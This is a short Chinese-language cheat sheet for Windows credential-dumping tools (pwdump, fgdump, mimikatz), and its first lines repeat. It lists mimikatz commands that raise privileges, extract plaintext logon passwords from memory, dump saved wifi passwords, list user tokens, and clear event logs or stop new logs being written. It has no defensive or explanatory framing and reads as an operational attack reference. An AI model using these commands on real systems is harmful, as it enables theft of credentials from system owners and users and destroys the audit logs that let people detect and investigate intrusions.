1、pwdump localhost
2、fgdump
3、mimikatz
能在内存中读取用户认证信息
在该程序命令行下:
::--help
有以下模块:
privilege、process、service、lsadump、ts、event、misc
1、pwdump localhost
2、fgdump
3、mimikatz
能在内存中读取用户认证信息
在该程序命令行下:
::--help
有以下模块:
privilege、process、service、lsadump、ts、event、misc
fgdump 双击即可
mimikatz
提取Windows系统的明文密码:
mimikatz.exe
:: #帮助信息 -h,?无效
privilege::debug #提升权限
sekurlsa::logonPasswords
event::clear #清除日志
event::drop #不再产生新日志
misc::cmd #启动cmd等服务
misc::wifi #查看电脑中存的wifi密码
token::whoami
token::list #列出所有用户